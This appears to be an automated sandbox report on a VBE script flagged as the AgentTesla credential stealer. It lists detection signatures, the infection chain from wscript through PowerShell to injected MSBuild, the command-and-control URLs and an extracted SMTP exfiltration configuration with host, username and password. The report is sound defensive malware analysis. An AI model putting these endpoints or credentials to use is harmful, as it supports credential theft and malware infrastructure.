
Windows Analysis Report
009.vbe

Overview

General Information

Sample name: 009.vbe
Analysis ID: 1590535
MD5: 9ff77002fbcbdd6e749722541b423034
SHA1: ea5ff219e2dde3cc57a1668ff0526be5b84e1250
SHA256: 5b3b169b48056c1cd8b84093c312de2f9ec1c7a1edcd7591743f6eac62c98ab9
Tags: vbe, user-cocaman

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: MSBuild connects to smtp port
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AgentTesla
AI detected suspicious sample
Injects a PE file into a foreign processes
Potential evasive VBS script found (sleep loop)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Suspicious execution chain found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows Shell Script Host drops VBS files
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 4656 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\009.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 7348 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 7784 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7836 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 8124 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • wermgr.exe (PID: 7328 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7836" "2812" "2804" "2144" "0" "0" "1284" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
Extracted configuration: {"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxsenses@vetrys.shop", "Password": "M992uew1mw6Z"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000F.00000002.2508931005.0000000002F8C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000F.00000002.2508931005.0000000002F94000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000F.00000002.2505099429.0000000001002000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000F.00000002.2505099429.0000000001002000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000F.00000002.2508931005.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
15.2.MSBuild.exe.1000000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
15.2.MSBuild.exe.1000000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
15.2.MSBuild.exe.1000000.0.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
Source | Rule | Description | Author
amsi64_7836.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen

Networking

Source: Network Connection | Author: Joe Security | Data: DestinationIp: 162.254.34.31, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 8124, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49972

System Summary

Source: Network Connection | Author: frack113, Florian Roth | Data: DestinationIp: 144.91.79.54, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 4656, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49699
Source: Network Connection | Author: Kiran kumar s, oscd.community | Data: DestinationIp: 104.26.12.205, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 8124, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49970
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\009.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\009.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\009.vbe", ProcessId: 4656, ProcessName: wscript.exe
Source: File created | Author: Tim Shelton | Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 4656, TargetFilename: C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbs
Source: Network Connection | Author: frack113 | Data: DestinationIp: 144.91.79.54, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 4656, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49699
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\009.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\009.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\009.vbe", ProcessId: 4656, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7784, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , ProcessId: 7836, ProcessName: powershell.exe

Suricata IDS alerts:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-14T08:47:05.827514+0100 | 2030171 | 1 | A Network Trojan was detected | 192.168.2.7 | 49972 | 162.254.34.31 | 587 | TCP

AV Detection

Source: 15.2.MSBuild.exe.1000000.0.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxsenses@vetrys.shop", "Password": "M992uew1mw6Z"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.2% probability
Source: unknown | HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.7:49970 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: Network traffic | Suricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.7:49972 -> 162.254.34.31:587
Source: C:\Windows\System32\wscript.exe | Network Connect: 144.91.79.54 80
Source: global traffic | TCP traffic: 192.168.2.7:49972 -> 162.254.34.31:587
Source: Joe Sandbox View | IP Address: 144.91.79.54
Source: Joe Sandbox View | IP Address: 104.26.12.205
Source: Joe Sandbox View | ASN Name: CONTABODE
Source: Joe Sandbox View | ASN Name: VIVIDHOSTINGUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: api.ipify.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0, Host: api.ipify.org, Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /2412/s HTTP/1.1, Connection: Keep-Alive, Accept: */*, User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5), Host: 144.91.79.54
Source: global traffic | HTTP traffic detected: GET /2412/v HTTP/1.1, Connection: Keep-Alive, Accept: */*, User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5), Host: 144.91.79.54
Source: global traffic | HTTP traffic detected: GET /2412/r HTTP/1.1, Connection: Keep-Alive, Accept: */*, User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5), Host: 144.91.79.54
Source: global traffic | HTTP traffic detected: GET /2412/cn HTTP/1.1, Connection: Keep-Alive, Accept: */*, User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5), Host: 144.91.79.54
Source: global traffic | HTTP traffic detected: GET /2412/file HTTP/1.1, Connection: Keep-Alive, Accept: */*, User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5), Host: 144.91.79.54
Source: global traffic | HTTP traffic detected: GET /2412/dl2xgIbUbOo3ZqLShxJX.txt HTTP/1.1, Connection: Keep-Alive, Accept: */*, User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5), Host: 144.91.79.54
Source: global traffic | DNS traffic detected: DNS query: time.windows.com
Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
Source: wscript.exe, 00000000.00000003.1263929463.000001B4FBF56000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54
Source: wscript.exe, 00000000.00000003.1263533043.000001B4FBFBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1298744247.000001B4FC015000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1300122294.000001B4FC01B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1297980853.000001B4FC00F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1297309774.000001B4FBFF8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/
Source: wscript.exe, 00000000.00000003.1297880876.000001B4FDC8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1288515705.000001B4FDC81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296994156.000001B4FDC8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1300343179.000001B4FDC90000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/2412/cn
Source: wscript.exe, 00000000.00000003.1297309774.000001B4FBFF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296199617.000001B4FBFEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296279117.000001B4FBFF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296973299.000001B4FBFEF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/2412/dl2xgIbUbOo3ZqLShxJX.txtU?E
Source: wscript.exe, 00000000.00000003.1297880876.000001B4FDC8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1288515705.000001B4FDC81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296994156.000001B4FDC8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1300343179.000001B4FDC90000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/2412/file
Source: wscript.exe, 00000000.00000003.1277534356.000001B4FBFA6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/2412/r
Source: wscript.exe, 00000000.00000003.1274037561.000001B4FBFB9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/2412/r&s
Source: wscript.exe, 00000000.00000003.1273950809.000001B4FBFDF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/2412/r4C
Source: wscript.exe, 00000000.00000003.1263929463.000001B4FBF56000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/2412/s
Source: wscript.exe, 00000000.00000003.1263929463.000001B4FBF56000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/2412/sX
Source: wscript.exe, 00000000.00000003.1263929463.000001B4FBF56000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/2412/ssceg
Source: wscript.exe, 00000000.00000003.1297880876.000001B4FDC8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296994156.000001B4FDC8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1300343179.000001B4FDC90000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/2412/v
Source: wscript.exe, 00000000.00000003.1274037561.000001B4FBFB9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/412/r
Source: wscript.exe, 00000000.00000003.1264311503.000001B4FBFB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1263533043.000001B4FBFBC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/6s
Source: wscript.exe, 00000000.00000003.1274037561.000001B4FBFB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1264311503.000001B4FBFB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1263533043.000001B4FBFBC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/Zs
Source: wscript.exe, 00000000.00000003.1274037561.000001B4FBFB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1263533043.000001B4FBFBC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/rs
Source: wscript.exe, 00000000.00000003.1297255452.000001B4FBF6F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1297767915.000001B4FBF70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1299612461.000001B4FBF70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1297232057.000001B4FBF5E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54:80/2412/dl2xgIbUbOo3ZqLShxJX.txt
Source: wscript.exe, 00000000.00000003.1263929463.000001B4FBF7A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54:80/2412/sPH
Source: wscript.exe, 00000000.00000003.1297255452.000001B4FBF6F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1297767915.000001B4FBF70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1299612461.000001B4FBF70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1297232057.000001B4FBF5E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54:80/2412/v
Source: wscript.exe, 00000000.00000003.1263929463.000001B4FBF56000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.bd060
Source: MSBuild.exe, 0000000F.00000002.2508931005.0000000002F11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: MSBuild.exe, 0000000F.00000002.2505099429.0000000001002000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/
Source: MSBuild.exe, 0000000F.00000002.2508931005.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.2505099429.0000000001002000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org
Source: MSBuild.exe, 0000000F.00000002.2508931005.0000000002F11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/
Source: MSBuild.exe, 0000000F.00000002.2508931005.0000000002F11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/t
Source: unknown | Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown | Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown | Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown | HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.7:49970 version: TLS 1.2

System Summary

Source: amsi64_7836.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
Source: 15.2.MSBuild.exe.1000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe | COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}
Source: C:\Windows\System32\wscript.exe | COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_02DF4AA015_2_02DF4AA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_02DFAA3215_2_02DFAA32
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_02DFDBE015_2_02DFDBE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_02DF3E8815_2_02DF3E88
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_02DF41D015_2_02DF41D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_02DFE4D515_2_02DFE4D5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_069545C015_2_069545C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06955D5015_2_06955D50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0695356015_2_06953560
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0695E0D915_2_0695E0D9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0695101815_2_06951018
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_069591F815_2_069591F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0695A15015_2_0695A150
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0695567015_2_06955670
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06953CAB15_2_06953CAB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_069502F815_2_069502F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0695C37015_2_0695C370
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06AAA19815_2_06AAA198
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_02DFDF8815_2_02DFDF88
                  Source: amsi64_7836.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: 15.2.MSBuild.exe.1000000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: wscript.exe, 00000007.00000002.1318391490.000001DF6EF5B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1317570324.000001DF6EF5A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1317355566.000001DF6EF56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: not find script file "C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbs".S;.VBP
                  Source: wscript.exe, 00000007.00000003.1315982443.000001DF6EF56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Can not find script file "C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbs".S;.VBP
                  Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winVBE@10/12@2/3
                  Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbsJump to behavior
                  Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_-508009730
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pczw0rl0.ttj.ps1Jump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbs"
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\009.vbe"
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbs"
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7836" "2812" "2804" "2144" "0" "0" "1284" "0" "0" "0" "0" "0"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
